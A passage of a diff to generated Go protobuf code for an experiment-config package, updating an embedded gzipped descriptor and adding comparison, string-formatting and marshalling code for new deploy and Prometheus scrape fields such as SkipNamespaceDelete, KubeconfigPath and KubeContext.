0xa4, - 0xd4, 0xdf, 0xba, 0x33, 0x3f, 0x21, 0xae, 0xbf, 0xda, 0x81, 0x7c, 0xbb, 0x99, 0x7f, 0x30, 0xe0, - 0xc6, 0xd2, 0x58, 0x44, 0x99, 0xe2, 0xae, 0x4f, 0x19, 0x27, 0x7e, 0x24, 0xba, 0x5c, 0x52, 0xcb, - 0x52, 0xb0, 0x17, 0x7a, 0x68, 0x2b, 0x15, 0x93, 0x6c, 0x05, 0xea, 0x70, 0x41, 0x41, 0x87, 0xa2, - 0x21, 0xbc, 0x03, 0x15, 0x79, 0x0c, 0xd2, 0x83, 0xea, 0x1e, 0x65, 0x09, 0x08, 0xeb, 0x5b, 0x50, - 0xe6, 0x64, 0x24, 0xa6, 0xd4, 0x25, 0xaf, 0xe0, 0x12, 0x27, 0xa3, 0x5e, 0xe8, 0x31, 0xf1, 0x42, - 0xba, 0xb1, 0x74, 0x4f, 0xff, 0xa7, 0xb8, 0xee, 0x01, 0x30, 0xfa, 0xcc, 0x72, 0x9d, 0x59, 0x60, - 0xaa, 0x5b, 0x0e, 0xe9, 0xb3, 0xfe, 0x6e, 0x2f, 0xf4, 0x70, 0x99, 0xd1, 0x67, 0x7d, 0x47, 0x38, - 0xfb, 0x04, 0xd6, 0x74, 0xca, 0xb4, 0xac, 0x8b, 0x6f, 0x93, 0x75, 0x4d, 0xf1, 0x95, 0xa4, 0xcd, - 0x7f, 0xe5, 0xe1, 0xfa, 0xb2, 0xda, 0xf5, 0xe6, 0xe7, 0x08, 0xfa, 0x06, 0xac, 0xfb, 0xa2, 0xb4, - 0x5b, 0xaa, 0x67, 0x0a, 0x3d, 0xe8, 0x57, 0x86, 0x84, 0x0f, 0x04, 0xfa, 0x98, 0x5e, 0xa0, 0x7b, - 0xb0, 0x91, 0xe5, 0x29, 0x95, 0xa8, 0x54, 0xaf, 0xcf, 0x98, 0x52, 0x9e, 0xa2, 0x29, 0x44, 0x61, - 0xcc, 0xe5, 0x0e, 0x56, 0xb0, 0x1c, 0x8b, 0xed, 0x31, 0x19, 0x53, 0xb2, 0xbd, 0x95, 0xb7, 0x6e, - 0x4f, 0xf1, 0x75, 0xc5, 0x3a, 0x49, 0x7f, 0x85, 0xc8, 0xd8, 0x9b, 0xab, 0x52, 0x4a, 0x1f, 0xbe, - 0xbd, 0x76, 0xeb, 0x9f, 0x26, 0xe2, 0x3c, 0x74, 0x71, 0xa9, 0xce, 0x4e, 0x88, 0x6d, 0x7e, 0x02, - 0x8d, 0x45, 0xc2, 0xff, 0x52, 0x58, 0xcc, 0x13, 0xa8, 0x66, 0x7e, 0xbe, 0x88, 0x9b, 0x18, 0x4c, - 0x7c, 0x2b, 0x08, 0x1d, 0xaa, 0x5e, 0xa7, 0x2b, 0xb8, 0x1c, 0x4c, 0xfc, 0x43, 0xf1, 0x8d, 0xee, - 0x41, 0x51, 0x4c, 0x68, 0x6d, 0xdd, 0x9c, 0x8f, 0x5d, 0x50, 0xa4, 0xf6, 0x25, 0xc7, 0xfc, 0x00, - 0xca, 0x09, 0x82, 0xde, 0x85, 0x9a, 0x4f, 0xec, 0xb1, 0x1b, 0x50, 0xd9, 0x4d, 0x74, 0x60, 0x55, - 0x8d, 0x1d, 0x8b, 0x06, 0xd3, 0x87, 0x92, 0xfe, 0x2d, 0x84, 0x1e, 0x40, 0x49, 0x35, 0xa3, 0xd7, - 0xfc, 0x54, 0xeb, 0xa8, 0x4e, 0x25, 0xcb, 0x8c, 0x26, 0x3e, 0x2a, 0x96, 0x8d, 0x46, 0xfe, 0x51, - 0xb1, 0x9c, 0x6f, 0x14, 0xcc, 0x5f, 0x1b, 0x00, 0x33, 0x0e, 0x7a, 0x1f, 0x8a, 0xe9, 0xa2, 0xf5, - 0xe5, 0xbe, 0x44, 0x04, 0x58, 0xb2, 0xd0, 0xf7, 0xa0, 0x9c, 0xfc, 0xce, 0x4d, 0xdf, 0x98, 0xaf, - 0x3d, 0xe1, 0x94, 0x9a, 0xbe, 0xf2, 0x0a, 0xb3, 0x57, 0xde, 0xbd, 0x3f, 0xa6, 0x71, 0x08, 0xff, - 0xa8, 0x01, 0xb5, 0xe1, 0x71, 0x07, 0x1f, 0x5b, 0x27, 0xfd, 0xcf, 0xfb, 0x7b, 0xb8, 0x91, 0x43, - 0xd7, 0x60, 0x5d, 0x21, 0x9f, 0x1d, 0xe1, 0xc7, 0x07, 0x47, 0x9d, 0xdd, 0x61, 0xc3, 0x40, 0x9b, - 0x70, 0x53, 0x81, 0x4f, 0xf6, 0x8e, 0x71, 0xbf, 0x67, 0xe1, 0xbd, 0xde, 0x11, 0xde, 0xdd, 0xc3, - 0xc3, 0x46, 0x1e, 0xad, 0x43, 0x75, 0x78, 0x7c, 0x34, 0x48, 0x3c, 0x14, 0x10, 0x82, 0xba, 0x04, - 0x66, 0x0e, 0x8a, 0xe8, 0x16, 0xdc, 0x90, 0xd8, 0x15, 0xfb, 0x15, 0x54, 0x82, 0x02, 0xfe, 0xf4, - 0xb0, 0xb1, 0x8a, 0x00, 0x56, 0xbb, 0x9f, 0xe2, 0xc3, 0xfe, 0x61, 0xa3, 0xd4, 0xed, 0xbe, 0x78, - 0xd9, 0xca, 0x7d, 0xf9, 0xb2, 0x95, 0xfb, 0xea, 0x65, 0xcb, 0xf8, 0xd5, 0xb4, 0x65, 0xfc, 0x69, - 0xda, 0x32, 0xfe, 0x36, 0x6d, 0x19, 0x2f, 0xa6, 0x2d, 0xe3, 0x1f, 0xd3, 0x96, 0xf1, 0xcf, 0x69, - 0x2b, 0xf7, 0xd5, 0xb4, 0x65, 0xfc, 0xee, 0x55, 0x2b, 0xf7, 0xe2, 0x55, 0x2b, 0xf7, 0xe5, 0xab, - 0x56, 0xee, 0xf3, 0x5a, 0xf6, 0xaf, 0x84, 0xd3, 0x55, 0x99, 0x9b, 0x0f, 0xff, 0x13, 0x00, 0x00, - 0xff, 0xff, 0x11, 0xaf, 0xeb, 0x55, 0x78, 0x10, 0x00, 0x00, + // 1859 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcf, 0x73, 0x1b, 0x49, + 0xf5, 0xd7, 0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0x8e, 0xf3, 0x55, 0xbc, 0x29, 0x39, 0xab, + 0xad, 
0x2f, 0x84, 0xb0, 0x6b, 0x13, 0x2f, 0x3f, 0xcc, 0x66, 0xd9, 0x2a, 0x49, 0x36, 0x58, 0x89, + 0x63, 0x8b, 0x96, 0xd7, 0x0b, 0x5b, 0x54, 0x4d, 0x8d, 0x67, 0xda, 0xf2, 0x94, 0x47, 0x33, 0x93, + 0xe9, 0x56, 0xd6, 0xe6, 0xc4, 0x85, 0xe2, 0x44, 0x15, 0x07, 0xf8, 0x0f, 0x38, 0xec, 0x9f, 0xc0, + 0x9d, 0x03, 0x70, 0xcb, 0x81, 0xc3, 0x9e, 0x5c, 0x44, 0xb9, 0x70, 0xdc, 0xff, 0x00, 0xaa, 0x5f, + 0xf7, 0x8c, 0x46, 0xb2, 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x4f, 0x7f, 0xde, 0xeb, 0xf7, 0x5e, 0xbf, + 0x1f, 0x2d, 0xc1, 0x77, 0x79, 0x64, 0x6f, 0xb1, 0x6d, 0x66, 0x0a, 0xc6, 0xc5, 0x56, 0xc8, 0xa2, + 0x33, 0x53, 0x04, 0x81, 0xb7, 0xc5, 0x2e, 0x43, 0x16, 0xb9, 0x43, 0xe6, 0x8b, 0xf0, 0x34, 0xf5, + 0xb1, 0x19, 0x46, 0x81, 0x08, 0x48, 0x25, 0xbc, 0xdc, 0x4c, 0xb8, 0xeb, 0x8d, 0x41, 0x10, 0x0c, + 0x3c, 0xb6, 0x85, 0x7b, 0xa7, 0xa3, 0xb3, 0x2d, 0x67, 0x14, 0x59, 0xc2, 0x0d, 0x7c, 0xc5, 0x5e, + 0xbf, 0x35, 0x08, 0x06, 0x01, 0x2e, 0xb7, 0xe4, 0x4a, 0xa1, 0xcd, 0x7f, 0x65, 0xa1, 0xba, 0x97, + 0x28, 0xee, 0x87, 0xcc, 0x26, 0x8f, 0xa0, 0xfc, 0xdc, 0xfd, 0xa5, 0xcb, 0x22, 0x93, 0x87, 0xcc, + 0xae, 0x1b, 0xf7, 0x8c, 0xfb, 0xe5, 0xed, 0xf5, 0xcd, 0xf4, 0x61, 0x9b, 0x9f, 0x05, 0xd1, 0x85, + 0x17, 0x58, 0x8e, 0x14, 0xa0, 0xa0, 0xe8, 0x28, 0xdc, 0x82, 0xea, 0x17, 0x7a, 0x0f, 0xc5, 0x79, + 0x3d, 0x7b, 0x2f, 0xf7, 0x16, 0xf9, 0xa5, 0x2f, 0x52, 0x5f, 0x9c, 0x3c, 0x82, 0xca, 0x90, 0x89, + 0xc8, 0xb5, 0xb5, 0x82, 0x1c, 0x2a, 0xa8, 0x4f, 0x2b, 0x78, 0x8a, 0x0c, 0x14, 0x2f, 0x0f, 0x93, + 0x35, 0x27, 0x1f, 0x43, 0xc5, 0xf6, 0x46, 0x5c, 0xc4, 0xd6, 0xe7, 0xd1, 0xfa, 0x3b, 0xd3, 0xc2, + 0x1d, 0xc5, 0x50, 0xd2, 0xf6, 0xe4, 0x83, 0x7c, 0x07, 0x8a, 0xd1, 0xc8, 0x57, 0x92, 0x0b, 0x28, + 0xb9, 0x36, 0x2d, 0x49, 0x47, 0x3e, 0x4a, 0x15, 0x22, 0xb5, 0x20, 0xef, 0x03, 0xd8, 0xc1, 0x70, + 0xe8, 0x0a, 0x93, 0x9f, 0x5b, 0xf5, 0xc5, 0x7b, 0xc6, 0xfd, 0x52, 0x7b, 0x69, 0x7c, 0xbd, 0x51, + 0xea, 0x20, 0xda, 0xdf, 0x6f, 0xd1, 0x92, 0x22, 0xf4, 0xcf, 0x2d, 0x42, 0x20, 0x2f, 0xac, 0x01, + 0xaf, 0x17, 0xee, 0xe5, 0xee, 0x97, 0x28, 0xae, 0x9b, 0x7f, 0x31, 0xa0, 0x92, 0x0e, 0x87, 0x24, + 0xf9, 0xd6, 0x90, 0x61, 0xe0, 0x4b, 0x14, 0xd7, 0x32, 0x26, 0x0e, 0x0b, 0xbd, 0xe0, 0xca, 0xe4, + 0x82, 0x85, 0x71, 0x50, 0x67, 0x62, 0xb2, 0x8b, 0x8c, 0xbe, 0x60, 0x21, 0x2d, 0x3b, 0xc9, 0x9a, + 0x93, 0x1f, 0x41, 0xe5, 0x9c, 0x59, 0x9e, 0x38, 0xb7, 0xcf, 0x99, 0x7d, 0x11, 0x07, 0x74, 0x26, + 0x26, 0xfb, 0xc8, 0xe8, 0x48, 0x06, 0x9d, 0xa2, 0x93, 0x6f, 0xc2, 0xb2, 0x65, 0xcb, 0x44, 0x32, + 0x39, 0xf3, 0x98, 0x2d, 0x82, 0x08, 0xa3, 0x5a, 0xa2, 0x55, 0x05, 0xf7, 0x35, 0xda, 0xfc, 0x9b, + 0x01, 0x30, 0xb1, 0x81, 0x74, 0xa0, 0x1c, 0x46, 0x2c, 0x62, 0xbe, 0xc3, 0x22, 0xe6, 0xe8, 0x3c, + 0xda, 0x98, 0x3e, 0xb5, 0x37, 0x21, 0x28, 0xc9, 0xfd, 0x0c, 0x4d, 0x4b, 0x91, 0x8f, 0xa0, 0xc8, + 0x2f, 0xac, 0xb3, 0xb3, 0xc0, 0x73, 0xea, 0x59, 0xd4, 0x70, 0x77, 0x5a, 0x43, 0x5f, 0xef, 0x26, + 0xe2, 0x09, 0x9f, 0x7c, 0x1b, 0xb2, 0xe1, 0x65, 0x3d, 0x37, 0x2f, 0x03, 0x7a, 0x97, 0x9d, 0x83, + 0x6e, 0x22, 0x92, 0x0d, 0x2f, 0xdb, 0x4b, 0xa0, 0x63, 0x66, 0x8a, 0xab, 0x90, 0x35, 0x7f, 0x6f, + 0x40, 0x39, 0x15, 0x12, 0xf2, 0x31, 0xe4, 0x2e, 0x76, 0xf8, 0x7c, 0x27, 0x9e, 0xec, 0xf4, 0x7b, + 0x81, 0xc3, 0x29, 0xb3, 0x9c, 0x2b, 0x64, 0xb7, 0x0b, 0xe3, 0xeb, 0x8d, 0xdc, 0x93, 0x9d, 0xfe, + 0x7e, 0x86, 0x4a, 0x31, 0xf2, 0x43, 0xc8, 0x85, 0x97, 0xde, 0x7c, 0x07, 0x7a, 0x97, 0x07, 0xa9, + 0x83, 0x94, 0xa8, 0xc4, 0x32, 0x54, 0xca, 0xb4, 0x2b, 0x00, 0x78, 0x0f, 0xca, 0xac, 0x87, 0xb0, + 0x72, 0xe3, 0x34, 0x72, 0x17, 0x4a, 0x32, 0x49, 0x78, 0x68, 0xd9, 0x71, 0xd6, 0x4c, 0x80, 0xe6, + 0x11, 0x54, 0xa7, 0x8f, 0x20, 
0xb7, 0x61, 0x91, 0xdb, 0x91, 0x1b, 0x0a, 0x4d, 0xd6, 0x5f, 0xe4, + 0xff, 0xa1, 0xca, 0x47, 0xb6, 0xcd, 0x38, 0x37, 0xed, 0xc0, 0x1b, 0x0d, 0x7d, 0x34, 0xb8, 0x44, + 0x97, 0x34, 0xda, 0x41, 0xb0, 0xf9, 0x0b, 0x28, 0xf5, 0x2c, 0x61, 0x9f, 0x63, 0xb2, 0xde, 0x85, + 0xfc, 0x95, 0x35, 0xf4, 0x94, 0xa6, 0x76, 0x71, 0x7c, 0xbd, 0x91, 0xff, 0x79, 0xeb, 0xe9, 0x01, + 0x45, 0x94, 0x3c, 0x84, 0x45, 0x61, 0x45, 0x03, 0x26, 0xb4, 0xeb, 0xb3, 0xb7, 0x20, 0xd5, 0x1c, + 0x23, 0x81, 0x6a, 0x62, 0xf3, 0x37, 0x59, 0x28, 0xa7, 0x70, 0xf2, 0x2d, 0x28, 0x59, 0xa1, 0x6b, + 0x0e, 0xa2, 0x60, 0x14, 0xea, 0x53, 0x2a, 0xe3, 0xeb, 0x8d, 0x62, 0xab, 0xd7, 0xfd, 0x89, 0xc4, + 0x68, 0xd1, 0x0a, 0x5d, 0x5c, 0x91, 0x2d, 0x28, 0x4b, 0xea, 0x73, 0x16, 0x71, 0x37, 0xd0, 0xc6, + 0xb7, 0xab, 0xe3, 0xeb, 0x0d, 0x68, 0xf5, 0xba, 0x27, 0x0a, 0xa5, 0x60, 0x85, 0xae, 0x5e, 0xcb, + 0x4a, 0xbb, 0x70, 0x7d, 0x07, 0x53, 0xa4, 0x44, 0x71, 0x9d, 0x54, 0x5f, 0x3e, 0x55, 0x7d, 0x53, + 0x01, 0x5e, 0x98, 0x09, 0xb0, 0x0c, 0x9b, 0x67, 0x9d, 0x32, 0x6f, 0x52, 0x1e, 0x8b, 0x2a, 0x6c, + 0x88, 0xc6, 0xd5, 0x41, 0xb6, 0x60, 0xd5, 0xf2, 0xfd, 0x40, 0x58, 0xd3, 0xa5, 0x54, 0x40, 0x2e, + 0x99, 0x6c, 0x25, 0xe5, 0xf4, 0xa5, 0x01, 0x2b, 0x37, 0xea, 0x43, 0x36, 0x1c, 0x19, 0x5a, 0x33, + 0xb4, 0xc4, 0xb9, 0xcc, 0xc7, 0x5c, 0xdc, 0x70, 0x64, 0xd8, 0x7b, 0x12, 0xa4, 0x25, 0x49, 0xc0, + 0x25, 0x79, 0x08, 0x85, 0x50, 0x06, 0x93, 0xc5, 0x2d, 0xe3, 0xff, 0xe6, 0xdc, 0x80, 0xea, 0x68, + 0x9a, 0x47, 0xb6, 0x61, 0x8d, 0x5f, 0xb8, 0xa1, 0x99, 0x38, 0x68, 0x3a, 0xcc, 0x63, 0x82, 0x61, + 0x94, 0x8a, 0x74, 0x55, 0x6e, 0x1e, 0xc6, 0x7b, 0xbb, 0xb8, 0xd5, 0xfc, 0xad, 0x01, 0xd5, 0xe9, + 0x42, 0x24, 0xef, 0xc1, 0x52, 0x5c, 0x88, 0x68, 0xab, 0xce, 0xb5, 0x4a, 0x0c, 0x4a, 0xfb, 0xa6, + 0x48, 0x56, 0x34, 0x50, 0x46, 0xa6, 0x48, 0xad, 0x68, 0x30, 0xe5, 0x43, 0xee, 0x3f, 0xf3, 0xa1, + 0x79, 0x05, 0xe5, 0x54, 0x85, 0xcb, 0x3b, 0x45, 0xed, 0x86, 0x6a, 0xbb, 0x72, 0x4d, 0x1a, 0x00, + 0x89, 0x87, 0xf1, 0xb9, 0x29, 0x84, 0x7c, 0x1f, 0xaa, 0x9c, 0x09, 0x33, 0x1e, 0x26, 0xae, 0xca, + 0x92, 0x62, 0xbb, 0x36, 0xbe, 0xde, 0xa8, 0xf4, 0x99, 0xd0, 0x33, 0xa4, 0xbb, 0x4b, 0x2b, 0x7c, + 0xf2, 0xe5, 0x34, 0xff, 0x64, 0x00, 0x4c, 0x86, 0x13, 0xd9, 0x51, 0x95, 0xaf, 0xfa, 0xc6, 0x3b, + 0x37, 0x2a, 0xbf, 0x8f, 0x95, 0x27, 0x99, 0xb3, 0x85, 0x4f, 0x76, 0x20, 0x1f, 0x46, 0xc1, 0x50, + 0x57, 0x4e, 0x73, 0xb6, 0x6f, 0x06, 0x43, 0x26, 0xce, 0xd9, 0x88, 0xf7, 0xed, 0xc8, 0x0a, 0x99, + 0xd4, 0xb0, 0x9f, 0xa1, 0x28, 0x31, 0xaf, 0x61, 0x3b, 0xf3, 0x1a, 0xb6, 0xec, 0x79, 0x7a, 0xd2, + 0x62, 0x73, 0x19, 0xe7, 0x60, 0x69, 0xca, 0xa6, 0xd7, 0x76, 0x8a, 0xbb, 0x50, 0xe2, 0x22, 0x62, + 0xd6, 0xd0, 0xf5, 0x07, 0x68, 0x60, 0x91, 0x4e, 0x00, 0xf2, 0x63, 0x58, 0xb1, 0x03, 0x4f, 0x9e, + 0x21, 0x6d, 0x90, 0x6f, 0x8b, 0xc0, 0x49, 0xda, 0xb0, 0x7a, 0xa5, 0x6c, 0xc6, 0xaf, 0x94, 0xcd, + 0x5d, 0xfd, 0x4a, 0xa1, 0xb5, 0x89, 0x4c, 0x0f, 0x45, 0xc8, 0xcf, 0x60, 0x59, 0xb0, 0x61, 0xe8, + 0x59, 0x82, 0x99, 0xcf, 0x2d, 0x6f, 0xc4, 0x78, 0x3d, 0x8f, 0x09, 0xb0, 0xf5, 0x86, 0x38, 0x6e, + 0x1e, 0x6b, 0x91, 0x13, 0x94, 0xd8, 0xf3, 0x45, 0x74, 0x45, 0xab, 0x62, 0x0a, 0x24, 0x14, 0x96, + 0x84, 0x75, 0xea, 0x31, 0x33, 0x18, 0x89, 0x70, 0x24, 0x78, 0x7d, 0x01, 0xf5, 0x7e, 0xf0, 0x46, + 0xbd, 0x52, 0xe0, 0x48, 0xf1, 0x95, 0xd6, 0x8a, 0x48, 0x41, 0xeb, 0x2d, 0x58, 0x9d, 0x73, 0x34, + 0xa9, 0x41, 0xee, 0x82, 0x5d, 0xe9, 0xf8, 0xc9, 0x25, 0xb9, 0x05, 0x0b, 0xe8, 0x8d, 0xee, 0xae, + 0xea, 0xe3, 0xa3, 0xec, 0x8e, 0xb1, 0x7e, 0x0a, 0x2b, 0x37, 0x4e, 0x99, 0xa3, 0xe0, 0x07, 0x69, + 0x05, 0xe5, 0xed, 0x77, 0x5f, 0x63, 0xb5, 0xd2, 0x72, 
0xe0, 0x72, 0x91, 0x3a, 0xa3, 0x49, 0x61, + 0x75, 0x0e, 0x83, 0x3c, 0x82, 0x42, 0x1c, 0x0b, 0x03, 0x63, 0xf1, 0x66, 0xad, 0xaa, 0xdc, 0xb4, + 0x44, 0xf3, 0xcf, 0xc6, 0x0d, 0xa5, 0x98, 0x3e, 0x8f, 0x61, 0x89, 0xbb, 0xfe, 0xc0, 0x63, 0xa6, + 0x4a, 0x33, 0x5d, 0x06, 0xef, 0xcd, 0x4c, 0x70, 0xa4, 0xa8, 0x9a, 0xe9, 0x5d, 0x1e, 0x28, 0xf9, + 0xfd, 0x0c, 0xad, 0xf0, 0xd4, 0x06, 0xf9, 0x29, 0xac, 0x38, 0x96, 0xb0, 0x4c, 0x2f, 0xc0, 0xf1, + 0x34, 0xf2, 0x05, 0x8b, 0x74, 0x00, 0x66, 0xf4, 0xed, 0x5a, 0xc2, 0x3a, 0x08, 0xe4, 0xb8, 0x42, + 0x52, 0xa2, 0x6f, 0xd9, 0x99, 0xde, 0x90, 0xe9, 0xaf, 0x3c, 0xc0, 0x07, 0x5f, 0xf3, 0x0f, 0x06, + 0xac, 0xcd, 0xb5, 0x45, 0xb6, 0x29, 0xe1, 0x0e, 0x19, 0x17, 0xd6, 0x30, 0x94, 0xa3, 0x31, 0xee, + 0x65, 0x09, 0xd8, 0x09, 0x3c, 0xb2, 0x91, 0x14, 0x13, 0xce, 0x0f, 0x75, 0xb9, 0xa0, 0x20, 0xd9, + 0x2f, 0xc9, 0x3b, 0x50, 0xc2, 0x6b, 0x40, 0x0d, 0x6a, 0xe4, 0x14, 0x11, 0x90, 0xd2, 0x77, 0xa0, + 0x28, 0xac, 0x81, 0xdc, 0x52, 0x49, 0x5e, 0xa2, 0x05, 0x61, 0x0d, 0x3a, 0x81, 0xc7, 0xe5, 0xb3, + 0x6a, 0x6d, 0xae, 0x4f, 0xff, 0x23, 0xbb, 0x1e, 0x00, 0x70, 0xf6, 0xcc, 0x74, 0x9d, 0x89, 0x61, + 0x6a, 0xc4, 0xf6, 0xd9, 0xb3, 0xee, 0x6e, 0x27, 0xf0, 0x68, 0x91, 0xb3, 0x67, 0x5d, 0x47, 0x2a, + 0xfb, 0x04, 0x96, 0x74, 0xc8, 0x74, 0x59, 0xe7, 0xdf, 0x56, 0xd6, 0x15, 0xc5, 0x57, 0x25, 0xdd, + 0xfc, 0x7b, 0x0e, 0x6e, 0xcd, 0xeb, 0x5d, 0x6f, 0x7e, 0xc3, 0x90, 0x6f, 0xc0, 0xf2, 0x50, 0xb6, + 0x76, 0x53, 0x0d, 0x5a, 0x59, 0x0f, 0xfa, 0x69, 0x82, 0xf0, 0x81, 0x44, 0x9f, 0xb0, 0x2b, 0xf2, + 0x00, 0x56, 0xd2, 0x3c, 0x55, 0x25, 0x2a, 0xd4, 0xcb, 0x13, 0x26, 0x96, 0xa7, 0x1c, 0x0a, 0x61, + 0x10, 0x09, 0xf4, 0x60, 0x81, 0xe2, 0x5a, 0xba, 0xc7, 0xd1, 0xa6, 0xd8, 0xbd, 0x85, 0xb7, 0xba, + 0xa7, 0xf8, 0xba, 0x63, 0x9d, 0x24, 0x3f, 0x5d, 0xd0, 0xf6, 0xfa, 0x22, 0x96, 0xd2, 0x87, 0x6f, + 0xef, 0xdd, 0xfa, 0xf7, 0x0c, 0xce, 0x55, 0xd5, 0x5c, 0xca, 0x93, 0x1b, 0xc2, 0x27, 0xf8, 0xc5, + 0xe8, 0x94, 0xd9, 0x81, 0x7f, 0xe6, 0x0e, 0xd4, 0x38, 0x55, 0xef, 0x86, 0xea, 0x04, 0xc6, 0x81, + 0xfa, 0x2e, 0x54, 0x24, 0x62, 0xda, 0x81, 0x2f, 0xd8, 0xa5, 0xa8, 0x17, 0x91, 0x55, 0x96, 0x58, + 0x47, 0x41, 0xc9, 0x03, 0xa7, 0x34, 0x79, 0xe0, 0xac, 0x7f, 0x02, 0xb5, 0x59, 0x03, 0xfe, 0x9b, + 0xc6, 0xd5, 0x3c, 0x81, 0x72, 0xea, 0x37, 0x95, 0xcc, 0x74, 0x7f, 0x34, 0x34, 0xfd, 0xc0, 0x61, + 0xea, 0xc9, 0xbc, 0x40, 0x8b, 0xfe, 0x68, 0x78, 0x28, 0xbf, 0xc9, 0x03, 0xc8, 0xcb, 0x0d, 0x5d, + 0xbb, 0xb7, 0xa7, 0x63, 0x23, 0x29, 0xd8, 0x5b, 0x90, 0xd3, 0xfc, 0x00, 0x8a, 0x31, 0x22, 0x5d, + 0x1b, 0x5a, 0xf6, 0xb9, 0xeb, 0x33, 0x9c, 0x56, 0xda, 0xb0, 0xb2, 0xc6, 0x8e, 0xe5, 0x00, 0xeb, + 0x42, 0x41, 0xff, 0x40, 0x23, 0xdb, 0x50, 0x50, 0xc3, 0xee, 0x35, 0xbf, 0x1f, 0x5b, 0x6a, 0x12, + 0x62, 0x1b, 0xd3, 0xc4, 0xc7, 0xf9, 0xa2, 0x51, 0xcb, 0x3e, 0xce, 0x17, 0xb3, 0xb5, 0x5c, 0xf3, + 0xd7, 0x06, 0xc0, 0x84, 0x43, 0xde, 0x87, 0x7c, 0x72, 0x68, 0x75, 0xbe, 0x2e, 0x69, 0x01, 0x45, + 0x16, 0xf9, 0x1e, 0x14, 0xe3, 0x1f, 0xdf, 0xc9, 0xc3, 0xf7, 0xb5, 0x19, 0x94, 0x50, 0x93, 0x9b, + 0xc9, 0x4d, 0x6e, 0xe6, 0xc1, 0x1f, 0x13, 0x3b, 0xa4, 0x7e, 0x52, 0x83, 0x4a, 0xff, 0xb8, 0x45, + 0x8f, 0xcd, 0x93, 0xee, 0xe7, 0xdd, 0x3d, 0x5a, 0xcb, 0x90, 0x55, 0x58, 0x56, 0xc8, 0x67, 0x47, + 0xf4, 0xc9, 0xc1, 0x51, 0x6b, 0xb7, 0x5f, 0x33, 0xc8, 0x3a, 0xdc, 0x56, 0xe0, 0xd3, 0xbd, 0x63, + 0xda, 0xed, 0x98, 0x74, 0xaf, 0x73, 0x44, 0x77, 0xf7, 0x68, 0xbf, 0x96, 0x25, 0xcb, 0x50, 0xee, + 0x1f, 0x1f, 0xf5, 0x62, 0x0d, 0x39, 0x42, 0xa0, 0x8a, 0xc0, 0x44, 0x41, 0x9e, 0xdc, 0x81, 0x35, + 0xc4, 0x6e, 0xc8, 0x2f, 0x90, 0x02, 0xe4, 0xe8, 0xa7, 0x87, 0xb5, 0x45, 0x02, 
0xb0, 0xd8, 0xfe, + 0x94, 0x1e, 0x76, 0x0f, 0x6b, 0x85, 0x76, 0xfb, 0xc5, 0xcb, 0x46, 0xe6, 0xab, 0x97, 0x8d, 0xcc, + 0xd7, 0x2f, 0x1b, 0xc6, 0xaf, 0xc6, 0x0d, 0xe3, 0xcb, 0x71, 0xc3, 0xf8, 0xeb, 0xb8, 0x61, 0xbc, + 0x18, 0x37, 0x8c, 0x7f, 0x8c, 0x1b, 0xc6, 0x3f, 0xc7, 0x8d, 0xcc, 0xd7, 0xe3, 0x86, 0xf1, 0xbb, + 0x57, 0x8d, 0xcc, 0x8b, 0x57, 0x8d, 0xcc, 0x57, 0xaf, 0x1a, 0x99, 0xcf, 0x2b, 0xe9, 0xff, 0x37, + 0x4e, 0x17, 0x31, 0x36, 0x1f, 0xfe, 0x3b, 0x00, 0x00, 0xff, 0xff, 0x2f, 0xd3, 0xa2, 0xe8, 0x0d, + 0x11, 0x00, 0x00, } func (x ActionType) String() string { @@ -2117,6 +2154,9 @@ func (this *PrerenderedDeploy) Equal(that interface{}) bool { return false } } + if this.SkipNamespaceDelete != that1.SkipNamespaceDelete { + return false + } return true } func (this *SkaffoldDeploy) Equal(that interface{}) bool { @@ -2546,6 +2586,15 @@ func (this *PrometheusScrapeSpec) Equal(that interface{}) bool { return false } } + if this.KubeconfigPath != that1.KubeconfigPath { + return false + } + if this.KubeContext != that1.KubeContext { + return false + } + if this.Name != that1.Name { + return false + } return true } func (this *ClusterSpec) Equal(that interface{}) bool { @@ -2819,12 +2868,13 @@ func (this *PrerenderedDeploy) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 6) + s := make([]string, 0, 7) s = append(s, "&experimentpb.PrerenderedDeploy{") s = append(s, "YAMLPaths: "+fmt.Sprintf("%#v", this.YAMLPaths)+",\n") if this.Patches != nil { s = append(s, "Patches: "+fmt.Sprintf("%#v", this.Patches)+",\n") } + s = append(s, "SkipNamespaceDelete: "+fmt.Sprintf("%#v", this.SkipNamespaceDelete)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -2995,7 +3045,7 @@ func (this *PrometheusScrapeSpec) GoString() string { if this == nil { return "nil" } - s := make([]string, 0, 10) + s := make([]string, 0, 13) s = append(s, "&experimentpb.PrometheusScrapeSpec{") s = append(s, "Namespace: "+fmt.Sprintf("%#v", this.Namespace)+",\n") s = append(s, "MatchLabelKey: "+fmt.Sprintf("%#v", this.MatchLabelKey)+",\n") @@ -3017,6 +3067,9 @@ func (this *PrometheusScrapeSpec) GoString() string { if this.MetricNames != nil { s = append(s, "MetricNames: "+mapStringForMetricNames+",\n") } + s = append(s, "KubeconfigPath: "+fmt.Sprintf("%#v", this.KubeconfigPath)+",\n") + s = append(s, "KubeContext: "+fmt.Sprintf("%#v", this.KubeContext)+",\n") + s = append(s, "Name: "+fmt.Sprintf("%#v", this.Name)+",\n") s = append(s, "}") return strings.Join(s, "") } @@ -3615,6 +3668,16 @@ func (m *PrerenderedDeploy) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if m.SkipNamespaceDelete { + i-- + if m.SkipNamespaceDelete { + dAtA[i] = 1 + } else { + dAtA[i] = 0 + } + i-- + dAtA[i] = 0x18 + } if len(m.Patches) > 0 { for iNdEx := len(m.Patches) - 1; iNdEx >= 0; iNdEx-- { { @@ -4165,6 +4228,27 @@ func (m *PrometheusScrapeSpec) MarshalToSizedBuffer(dAtA []byte) (int, error) { _ = i var l int _ = l + if len(m.Name) > 0 { + i -= len(m.Name) + copy(dAtA[i:], m.Name) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.Name))) + i-- + dAtA[i] = 0x4a + } + if len(m.KubeContext) > 0 { + i -= len(m.KubeContext) + copy(dAtA[i:], m.KubeContext) + i = encodeVarintExperiment(dAtA, i, uint64(len(m.KubeContext))) + i-- + dAtA[i] = 0x42 + } + if len(m.KubeconfigPath) > 0 { + i -= len(m.KubeconfigPath) + 